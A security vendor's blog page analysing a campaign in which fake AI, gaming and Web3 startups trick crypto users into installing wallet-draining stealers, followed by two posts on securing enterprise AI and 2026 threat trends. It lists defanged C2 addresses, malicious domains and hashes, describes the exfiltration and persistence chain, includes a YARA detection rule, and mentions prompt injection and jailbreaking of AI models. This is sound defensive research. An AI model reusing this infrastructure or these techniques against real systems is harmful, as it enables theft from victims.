Blog
/
Cloud
/
July 10, 2025

Crypto Wallets Continue to be Drained in Elaborate Social Media Scam

Darktrace’s latest research reveals that an evolving social engineering campaign continues to target cryptocurrency users through fake startup companies. These malicious operations impersonate AI, gaming, and Web3 firms using spoofed social media accounts and project documentation hosted on legitimate platforms like Notion and GitHub.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Tara Gould
Threat Researcher
password on computer screenDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog image
10
Jul 2025

Overview

Continued research by Darktrace has revealed that cryptocurrency users are being targeted by threat actors in an elaborate social engineering scheme that continues to evolve. In December 2024, Cado Security Labs detailed a campaign targeting Web 3 employees in the Meeten campaign. The campaign included threat actors setting up meeting software companies to trick users into joining meetings and installing the information stealer Realst disguised as video meeting software.

The latest research from Darktrace shows that this campaign is still ongoing and continues to trick targets to download software to drain crypto wallets. The campaign features:

  • Threat actors creating fake startup companies with AI, gaming, video meeting software, web3 and social media themes.
  • Use of compromised X (formerly Twitter) accounts for the companies and employees - typically with verification to contact victims and create a facade of a legitimate company.
  • Notion, Medium, Github used to provide whitepapers, project roadmaps and employee details.
  • Windows and macOS versions.
  • Stolen software signing certificates in Windows versions for credibility and defense evasion.
  • Anti-analysis techniques including obfuscation, and anti-sandboxing.

To trick as many victims as possible, threat actors try to make the companies look as legitimate as possible. To achieve this, they make use of sites that are used frequently with software companies such as Twitter, Medium, Github and Notion. Each company has a professional looking website that includes employees, product blogs, whitepapers and roadmaps. X is heavily used to contact victims, and to increase the appearance of legitimacy. Some of the observed X accounts appear to be compromised accounts that typically are verified and have a higher number of followers and following, adding to the appearance of a real company.

Example of a compromised X account to create a “BuzzuAI” employee.
Figure 1: Example of a compromised X account to create a “BuzzuAI” employee.

The threat actors are active on these accounts while the campaign is active, posting about developments in the software, and product marketing. One of the fake companies part of this campaign, “Eternal Decay”, a blockchain-powered game, has created fake pictures pretending to be presenting at conferences to post on social media, while the actual game doesn’t exist.

From the Eternal Decay X account, threat actors have altered a photo from an Italian exhibition (original on the right) to make it look like Eternal Decay was presented.
Figure 2: From the Eternal Decay X account, threat actors have altered a photo from an Italian exhibition (original on the right) to make it look like Eternal Decay was presented.

In addition to X, Medium is used to post blogs about the software. Notion has been used in various campaigns with product roadmap details, as well as employee lists.

Notion project team page for Swox.
Figure 3: Notion project team page for Swox.

Github has been used to detail technical aspects of the software, along with Git repositories containing stolen open-source projects with the name changed in order to make the code look unique. In the Eternal Decay example, Gitbook is used to detail company and software information. The threat actors even include company registration information from Companies House, however they have linked to a company with a similar name and are not a real registered company.

 From the Eternal Decay Gitbook linking to a company with a similar name on Companies House.
Figure 4: From the Eternal Decay Gitbook linking to a company with a similar name on Companies House.
Gitbook for “Eternal Decay” listing investors.
Figure 5: Gitbook for “Eternal Decay” listing investors.
Gameplay images are stolen from a different game “Zombie Within” and posted pretending to be Eternal Decay gameplay.
Figure 6: Gameplay images are stolen from a different game “Zombie Within” and posted pretending to be Eternal Decay gameplay.

In some of the fake companies, fake merchandise stores have even been set up. With all these elements combined, the threat actors manage to create the appearance of a legitimate start-up company, increasing their chances of infection.

Each campaign typically starts with a victim being contacted through X messages, Telegram or Discord. A fake employee of the company will contact a victim asking to test out their software in exchange for a cryptocurrency payment. The victim will be directed to the company website download page, where they need to enter a registration code, provided by the employee to download a binary. Depending on their operating system, the victim will be instructed to download a macOS DMG (if available) or a Windows Electron application.

Example of threat actor messaging a victim on X with a registration code.
Figure 7: Example of threat actor messaging a victim on X with a registration code.

Windows Version

Similar to the aforementioned Meeten campaign, the Windows version being distributed by the fake software companies is an Electron application. Electron is an open-source framework used to run Javascript apps as a desktop application. Once the user follows directions sent to them via message, opening the application will bring up a Cloudflare verification screen.

Cloudflare verification screen.
Figure 8: Cloudflare verification screen.

The malware begins by profiling the system, gathering information like the username, CPU and core count, RAM, operating system, MAC address, graphics card, and UUID.

Code from the Electron app showing console output of system profiling.
Figure 9: Code from the Electron app showing console output of system profiling.

A verification process occurs with a captcha token extracted from the app-launcher URL and sent along with the system info and UUID. If the verification is successful, an executable or MSI file is downloaded and executed quietly. Python is also retrieved and stored in /AppData/Temp, with Python commands being sent from the command-and-control (C2) infrastructure.

Code from the Electron app looping through Python objects.
Figure 10: Code from the Electron app looping through Python objects.

As there was no valid token, this process did not succeed. However, based on previous campaigns and reports from victims on social media, an information stealer targeting crypto wallets is executed at this stage. A common tactic in the observed campaigns is the use of stolen code signing certificates to evade detection and increase the appearance of legitimate software. The certificates of two legitimate companies Jiangyin Fengyuan Electronics Co., Ltd. and Paperbucketmdb ApS (revoked as of June 2025) were used during this campaign.

MacOS Version

For companies that have a macOS version of the malware, the user is directed to download a DMG. The DMG contains a bash script and a multiarch macOS binary. The bash script is obfuscated with junk, base64 and is XOR’d.

Obfuscated Bash script.
Figure 11: Obfuscated Bash script.

After decoding, the contents of the script are revealed showing that AppleScript is being used. The script looks for disk drives, specifically for the mounted DMG “SwoxApp” and moves the hidden .SwoxApp binary to /tmp/ and makes it executable. This type of AppleScript is commonly used in macOS malware, such as Atomic Stealer.

AppleScript used to mount the malware and make it executable.
Figure 12: AppleScript used to mount the malware and make it executable.

The SwoxApp binary is the prominent macOS information stealer Atomic Stealer. Once executed the malware performs anti-analysis checks for QEMU, VMWare and Docker-OSX, the script exits if these return true.  The main functionality of Atomic Stealer is to steal data from stores including browser data, crypto wallets, cookies and documents. This data is compressed into /tmp/out.zip and sent via POST request to 45[.]94[.]47[.]167/contact. An additional bash script is retrieved from 77[.]73[.]129[.]18:80/install.sh.

Additional Bash script ”install.sh”.
Figure 13: Additional Bash script ”install.sh”.

Install.sh, as shown in Figure 13, retrieves another script install_dynamic.sh from the server https://mrajhhosdoahjsd[.]com. Install_dynamic.sh downloads and extracts InstallerHelper.app, then sets up persistence via Launch Agent to run at login.

Persistence added via Plist configuration.
Figure 14: Persistence added via Plist configuration.

This plist configuration installs a macOS LaunchAgent that silently runs the app at user login. RunAtLoad and KeepAlive keys are used to ensure the app starts automatically and remains persistent.

The retrieved binary InstallerHelper is an Objective-C/Swift binary that logs active application usage, window information, and user interaction timestamps. This data is written to local log files and periodically transmits the contents to https://mrajhhoshoahjsd[.]com/collect-metrics using scheduled network requests.

List of known companies

Darktrace has identified a number of the fake companies used in this scam. These can be found in the list below:

Pollens AI
X: @pollensapp, @Pollens_app
Website: pollens.app, pollens.io, pollens.tech
Windows: 02a5b35be82c59c55322d2800b0b8ccc
Notes: Posing as an AI software company with a focus on “collaborative creation”.

Buzzu
X: @BuzzuApp, @AI_Buzzu, @AppBuzzu, @BuzzuApp
Website: Buzzu.app, Buzzu.us, buzzu.me, Buzzu.space
Windows: 7d70a7e5661f9593568c64938e06a11a
Mac: be0e3e1e9a3fda76a77e8c5743dd2ced
Notes: Same as Pollens including logo but with a different name.

Cloudsign
X: @cloudsignapp
Windows: 3a3b13de4406d1ac13861018d74bf4b2
Notes: Claims to be a document signing platform.

Swox
X: @SwoxApp, @Swox_AI, @swox_app, @App_Swox, @AppSwox, @SwoxProject, @ProjectSwox
Website: swox.io, swox.app, swox.cc, swoxAI.com, swox.us
Windows: d50393ba7d63e92d23ec7d15716c7be6
Mac: 81996a20cfa56077a3bb69487cc58405ced79629d0c09c94fb21ba7e5f1a24c9
Notes: Claims to be a “Next gen social network in the WEB3”. Same GitHub code as Pollens.

KlastAI
X: Links to Pollens X account
Website: Links to pollens.tech
Notes: Same as Pollens, still shows their branding on its GitHub readme page.

Wasper
X: @wasperAI, @WasperSpace
Website: wasper.pro, wasper.app, wasper.org, wasper.space
Notes: Same logo and GitHub code as Pollens.

Lunelior
Website: lunelior.net, Lunelior.app, lunelior.io, lunelior.us
Windows: 74654e6e5f57a028ee70f015ef3a44a4
Mac: d723162f9197f7a548ca94802df74101

BeeSync
X: @BeeSyncAI, @AIBeeSync
Website: beesync.ai, beesync.cc
Notes: Previous alias of Buzzu, Git repo renamed January 2025.

Slax
X: @SlaxApp, @Slax_app, @slaxproject
Website: slax.tech, slax.cc, slax.social, slaxai.app

Solune
X: @soluneapp
Website: solune.io, solune.me
Windows: 22b2ea96be9d65006148ecbb6979eccc

Eternal Decay
X: @metaversedecay
Website: eternal-decay.xyz
Windows: 558889183097d9a991cb2c71b7da3c51
Mac: a4786af0c4ffc84ff193ff2ecbb564b8

Dexis
X: @DexisApp
Website: dexis.app
Notes: Same branding as Swox.

NexVoo
X: @Nexvoospace
Website: nexvoo.app, Nexvoo.net, Nexvoo.us

NexLoop
X: @nexloopspace
Website: nexloop.me

NexoraCore
Notes: Rename of the Nexloop Git repo.

YondaAI
X: @yondaspace
Website: yonda.us

Traffer Groups

A “traffer” malware group is an organized cybercriminal operation that specializes in directing internet users to malicious content typically information-stealing malware through compromised or deceptive websites, ads, and links. They tend to operate in teams with hierarchical structures with administrators recruiting “traffers” (or affiliates) to generate traffic and malware installs via search engine optimization (SEO), YouTube ads, fake software downloads, or owned sites, then monetize the stolen credentials and data via dedicated marketplaces.

A prominent traffer group “CrazyEvil” was identified by Recorded Future in early 2025. The group, who have been active since at least 2021, specialize in social engineering attacks targeted towards cryptocurrency users, influencers, DeFi professionals, and gaming communities. As reported by Recorded Future, CrazyEvil are estimated to have made millions of dollars in revenue from their malicious activity. CrazyEvil and their sub teams create fake software companies, similar to the ones described in this blog, making use of Twitter and Medium to target victims. As seen in this campaign, CrazyEvil instructs users to download their software which is an info stealer targeting both macOS and Windows users.

While it is unclear if the campaigns described in this blog can be attributed to CrazyEvil or any sub teams, the techniques described are similar in nature. This campaign highlights the efforts that threat actors will go to make these fake companies look legitimate in order to steal cryptocurrency from victims, in addition to use of newer evasive versions of malware.

Indicators of Compromise (IoCs)

Manboon[.]com

https://gaetanorealty[.]com

Troveur[.]com

Bigpinellas[.]com

Dsandbox[.]com

Conceptwo[.]com

Aceartist[.]com

turismoelcasco[.]com

Ekodirect[.]com

https://mrajhhosdoahjsd[.]com

https://isnimitz.com/zxc/app[.]zip

http://45[.]94[.]47[.]112/contact

45[.]94[.]47[.]167/contact

77[.]73[.]129[.]18:80

Domain Keys associated with the C2s

YARA Rules

rule Suspicious_Electron_App_Installer

{

  meta:

      description = "Detects Electron apps collecting HWID, MAC, GPU info and executing remote EXEs/MSIs"

      date = "2025-06-18"

  strings:

      $electron_require = /require\(['"]electron['"]\)/

      $axios_require = /require\(['"]axios['"]\)/

      $exec_use = /exec\(.*?\)/

      $url_token = /app-launcher:\/\/.*token=/

      $getHWID = /(Get-CimInstance Win32_ComputerSystemProduct).UUID/

      $getMAC = /details\.mac && details\.mac !== '00:00:00:00:00:00'/

      $getGPU = /wmic path win32_VideoController get name/

      $getInstallDate = /InstallDate/

      $os_info = /os\.cpus\(\)\[0\]\.model/

      $downloadExe = /\.exe['"]/

      $runExe = /msiexec \/i.*\/quiet \/norestart/

      $zipExtraction = /AdmZip\(.*\.extractAllTo/

  condition:

      (all of ($electron_require, $axios_require, $exec_use) and

       3 of ($getHWID, $getMAC, $getGPU, $getInstallDate, $os_info) and

       2 of ($downloadExe, $runExe, $zipExtraction, $url_token))

}

Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Tara Gould
Threat Researcher

More in this series

No items found.

Blog

/

AI

/

December 23, 2025

How to Secure AI in the Enterprise: A Practical Framework for Models, Data, and Agents

How to secure AI in the enterprise: A practical framework for models, data, and agents Default blog imageDefault blog image

Introduction: Why securing AI is now a security priority

AI adoption is at the forefront of the digital movement in businesses, outpacing the rate at which IT and security professionals can set up governance models and security parameters. Adopting Generative AI chatbots, autonomous agents, and AI-enabled SaaS tools promises efficiency and speed but also introduces new forms of risk that traditional security controls were never designed to manage. For many organizations, the first challenge is not whether AI should be secured, but what “securing AI” actually means in practice. Is it about protecting models? Governing data? Monitoring outputs? Or controlling how AI agents behave once deployed?  

While demand for adoption increases, securing AI use in the enterprise is still an abstract concept to many and operationalizing its use goes far beyond just having visibility. Practitioners need to also consider how AI is sourced, built, deployed, used, and governed across the enterprise.

The goal for security teams: Implement a clear, lifecycle-based AI security framework. This blog will demonstrate the variety of AI use cases that should be considered when developing this framework and how to frame this conversation to non-technical audiences.  

What does “securing AI” actually mean?

Securing AI is often framed as an extension of existing security disciplines. In practice, this assumption can cause confusion.

Traditional security functions are built around relatively stable boundaries. Application security focuses on code and logic. Cloud security governs infrastructure and identity. Data security protects sensitive information at rest and in motion. Identity security controls who can access systems and services. Each function has clear ownership, established tooling, and well-understood failure modes.

AI does not fit neatly into any of these categories. An AI system is simultaneously:

  • An application that executes logic
  • A data processor that ingests and generates sensitive information
  • A decision-making layer that influences or automates actions
  • A dynamic system that changes behavior over time

As a result, the security risks introduced by AI cuts across multiple domains at once. A single AI interaction can involve identity misuse, data exposure, application logic abuse, and supply chain risk all within the same workflow. This is where the traditional lines between security functions begin to blur.

For example, a malicious prompt submitted by an authorized user is not a classic identity breach, yet it can trigger data leakage or unauthorized actions. An AI agent calling an external service may appear as legitimate application behavior, even as it violates data sovereignty or compliance requirements. AI-generated code may pass standard development checks while introducing subtle vulnerabilities or compromised dependencies.

In each case, no single security team “owns” the risk outright.

This is why securing AI cannot be reduced to model safety, governance policies, or perimeter controls alone. It requires a shared security lens that spans development, operations, data handling, and user interaction. Securing AI means understanding not just whether systems are accessed securely, but whether they are being used, trained, and allowed to act in ways that align with business intent and risk tolerance.

At its core, securing AI is about restoring clarity in environments where accountability can quickly blur. It is about knowing where AI exists, how it behaves, what it is allowed to do, and how its decisions affect the wider enterprise. Without this clarity, AI becomes a force multiplier for both productivity and risk.

The five categories of AI risk in the enterprise

A practical way to approach AI security is to organize risk around how AI is used and where it operates. The framework below defines five categories of AI risk, each aligned to a distinct layer of the enterprise AI ecosystem  

How to Secure AI in the Enterprise:

  • Defending against misuse and emergent behaviors
  • Monitoring and controlling AI in operation
  • Protecting AI development and infrastructure
  • Securing the AI supply chain
  • Strengthening readiness and oversight

Together, these categories provide a structured lens for understanding how AI risk manifests and where security teams should focus their efforts.

1. Defending against misuse and emergent AI behaviors

Generative AI systems and agents can be manipulated in ways that bypass traditional controls. Even when access is authorized, AI can be misused, repurposed, or influenced through carefully crafted prompts and interactions.

Key risks include:

  • Malicious prompt injection designed to coerce unwanted actions
  • Unauthorized or unintended use cases that bypass guardrails
  • Exposure of sensitive data through prompt histories
  • Hallucinated or malicious outputs that influence human behavior

Unlike traditional applications, AI systems can produce harmful outcomes without being explicitly compromised. Securing this layer requires monitoring intent, not just access. Security teams need visibility into how AI systems are being prompted, how outputs are consumed, and whether usage aligns with approved business purposes

2. Monitoring and controlling AI in operation

Once deployed, AI agents operate at machine speed and scale. They can initiate actions, exchange data, and interact with other systems with little human oversight. This makes runtime visibility critical.

Operational AI risks include:

  • Agents using permissions in unintended ways
  • Uncontrolled outbound connections to external services or agents
  • Loss of forensic visibility into ephemeral AI components
  • Non-compliant data transmission across jurisdictions

Securing AI in operation requires real-time monitoring of agent behavior, centralized control points such as AI gateways, and the ability to capture agent state for investigation. Without these capabilities, security teams may be blind to how AI systems behave once live, particularly in cloud-native or regulated environments.

3. Protecting AI development and infrastructure

Many AI risks are introduced long before deployment. Development pipelines, infrastructure configurations, and architectural decisions all influence the security posture of AI systems.

Common risks include:

  • Misconfigured permissions and guardrails
  • Insecure or overly complex agent architectures
  • Infrastructure-as-Code introducing silent misconfigurations
  • Vulnerabilities in AI-generated code and dependencies

AI-generated code adds a new dimension of risk, as hallucinated packages or insecure logic may be harder to detect and debug than human-written code. Securing AI development means applying security controls early, including static analysis, architectural review, and continuous configuration monitoring throughout the build process.

4. Securing the AI supply chain

AI supply chains are often opaque. Models, datasets, dependencies, and services may come from third parties with varying levels of transparency and assurance.

Key supply chain risks include:

  • Shadow AI tools used outside approved controls
  • External AI agents granted internal access
  • Suppliers applying AI to enterprise data without disclosure
  • Compromised models, training data, or dependencies

Securing the AI supply chain requires discovering where AI is used, validating the provenance and licensing of models and data, and assessing how suppliers process and protect enterprise information. Without this visibility, organizations risk data leakage, regulatory exposure, and downstream compromise through trusted integrations.

5. Strengthening readiness and oversight

Even with strong technical controls, AI security fails without governance, testing, and trained teams. AI introduces new incident scenarios that many security teams are not yet prepared to handle.

Oversight risks include:

  • Lack of meaningful AI risk reporting
  • Untested AI systems in production
  • Security teams untrained in AI-specific threats

Organizations need AI-aware reporting, red and purple team exercises that include AI systems, and ongoing training to build operational readiness. These capabilities ensure AI risks are understood, tested, and continuously improved, rather than discovered during a live incident.

Reframing AI security for the boardroom

AI security is not just a technical issue. It is a trust, accountability, and resilience issue. Boards want assurance that AI-driven decisions are reliable, explainable, and protected from tampering.

Effective communication with leadership focuses on:

  • Trust: confidence in data integrity, model behavior, and outputs
  • Accountability: clear ownership across teams and suppliers
  • Resilience: the ability to operate, audit, and adapt under attack or regulation

Mapping AI security efforts to recognized frameworks such as ISO/IEC 42001 and the NIST AI Risk Management Framework helps demonstrate maturity and aligns AI security with broader governance objectives.

Conclusion: Securing AI is a lifecycle challenge

The same characteristics that make AI transformative also make it difficult to secure. AI systems blur traditional boundaries between software, users, and decision-making, expanding the attack surface in subtle but significant ways.

Securing AI requires restoring clarity. Knowing where AI exists, how it behaves, who controls it, and how it is governed. A framework-based approach allows organizations to innovate with AI while maintaining trust, accountability, and control.

The journey to secure AI is ongoing, but it begins with understanding the risks across the full AI lifecycle and building security practices that evolve alongside the technology.

Continue reading
About the author
Brittany Woodsmall
Product Marketing Manager, AI & Attack Surface

Blog

/

AI

/

December 22, 2025

The Year Ahead: AI Cybersecurity Trends to Watch in 2026

2026 cyber threat trendsDefault blog imageDefault blog image

Introduction: 2026 cyber trends

Each year, we ask some of our experts to step back from the day-to-day pace of incidents, vulnerabilities, and headlines to reflect on the forces reshaping the threat landscape. The goal is simple:  to identify and share the trends we believe will matter most in the year ahead, based on the real-world challenges our customers are facing, the technology and issues our R&D teams are exploring, and our observations of how both attackers and defenders are adapting.  

In 2025, we saw generative AI and early agentic systems moving from limited pilots into more widespread adoption across enterprises. Generative AI tools became embedded in SaaS products and enterprise workflows we rely on every day, AI agents gained more access to data and systems, and we saw glimpses of how threat actors can manipulate commercial AI models for attacks. At the same time, expanding cloud and SaaS ecosystems and the increasing use of automation continued to stretch traditional security assumptions.

Looking ahead to 2026, we’re already seeing the security of AI models, agents, and the identities that power them becoming a key point of tension – and opportunity -- for both attackers and defenders. Long-standing challenges and risks such as identity, trust, data integrity, and human decision-making will not disappear, but AI and automation will increase the speed and scale of the cyber risk.  

Here's what a few of our experts believe are the trends that will shape this next phase of cybersecurity, and the realities organizations should prepare for.  

Agentic AI is the next big insider risk

In 2026, organizations may experience their first large-scale security incidents driven by agentic AI behaving in unintended ways—not necessarily due to malicious intent, but because of how easily agents can be influenced. AI agents are designed to be helpful, lack judgment, and operate without understanding context or consequence. This makes them highly efficient—and highly pliable. Unlike human insiders, agentic systems do not need to be socially engineered, coerced, or bribed. They only need to be prompted creatively, misinterpret legitimate prompts, or be vulnerable to indirect prompt injection. Without strong controls around access, scope, and behavior, agents may over-share data, misroute communications, or take actions that introduce real business risk. Securing AI adoption will increasingly depend on treating agents as first-class identities—monitored, constrained, and evaluated based on behavior, not intent.

-- Nicole Carignan, SVP of Security & AI Strategy

Prompt Injection moves from theory to front-page breach

We’ll see the first major story of an indirect prompt injection attack against companies adopting AI either through an accessible chatbot or an agentic system ingesting a hidden prompt. In practice, this may result in unauthorized data exposure or unintended malicious behavior by AI systems, such as over-sharing information, misrouting communications, or acting outside their intended scope. Recent attention on this risk—particularly in the context of AI-powered browsers and additional safety layers being introduced to guide agent behavior—highlights a growing industry awareness of the challenge.  

-- Collin Chapleau, Senior Director of Security & AI Strategy

Humans are even more outpaced, but not broken

When it comes to cyber, people aren’t failing; the system is moving faster than they can. Attackers exploit the gap between human judgment and machine-speed operations. The rise of deepfakes and emotion-driven scams that we’ve seen in the last few years reduce our ability to spot the familiar human cues we’ve been taught to look out for. Fraud now spans social platforms, encrypted chat, and instant payments in minutes. Expecting humans to be the last line of defense is unrealistic.

Defense must assume human fallibility and design accordingly. Automated provenance checks, cryptographic signatures, and dual-channel verification should precede human judgment. Training still matters, but it cannot close the gap alone. In the year ahead, we need to see more of a focus on partnership: systems that absorb risk so humans make decisions in context, not under pressure.

-- Margaret Cunningham, VP of Security & AI Strategy

AI removes the attacker bottleneck—smaller organizations feel the impact

One factor that is currently preventing more companies from breaches is a bottleneck on the attacker side: there’s not enough human hacker capital. The number of human hands on a keyboard is a rate-determining factor in the threat landscape. Further advancements of AI and automation will continue to open that bottleneck. We are already seeing that. The ostrich approach of hoping that one’s own company is too obscure to be noticed by attackers will no longer work as attacker capacity increases.  

-- Max Heinemeyer, Global Field CISO

SaaS platforms become the preferred supply chain target

Attackers have learned a simple lesson: compromising SaaS platforms can have big payouts. As a result, we’ll see more targeting of commercial off-the-shelf SaaS providers, which are often highly trusted and deeply integrated into business environments. Some of these attacks may involve software with unfamiliar brand names, but their downstream impact will be significant. In 2026, expect more breaches where attackers leverage valid credentials, APIs, or misconfigurations to bypass traditional defenses entirely.

-- Nathaniel Jones, VP of Security & AI Strategy

Increased commercialization of generative AI and AI assistants in cyber attacks

One trend we’re watching closely for 2026 is the commercialization of AI-assisted cybercrime. For example, cybercrime prompt playbooks sold on the dark web—essentially copy-and-paste frameworks that show attackers how to misuse or jailbreak AI models. It’s an evolution of what we saw in 2025, where AI lowered the barrier to entry. In 2026, those techniques become productized, scalable, and much easier to reuse.  

-- Toby Lewis, Global Head of Threat Analysis

Conclusion

Taken together, these trends underscore that the core challenges of cybersecurity are not changing dramatically -- identity, trust, data, and human decision-making still sit at the core of most incidents. What is changing quickly is the environment in which these challenges play out. AI and automation are accelerating everything: how quickly attackers can scale, how widely risk is distributed, and how easily unintended behavior can create real impact. And as technology like cloud services and SaaS platforms become even more deeply integrated into businesses, the potential attack surface continues to expand.  

Predictions are not guarantees. But the patterns emerging today suggest that 2026 will be a year where securing AI becomes inseparable from securing the business itself. The organizations that prepare now—by understanding how AI is used, how it behaves, and how it can be misused—will be best positioned to adopt these technologies with confidence in the year ahead.

Learn more about how to secure AI adoption in the enterprise without compromise by registering to join our live launch webinar on February 3, 2026.  

Continue reading
About the author
The Darktrace Community
Your data. Our AI.
Elevate your network security with Darktrace AI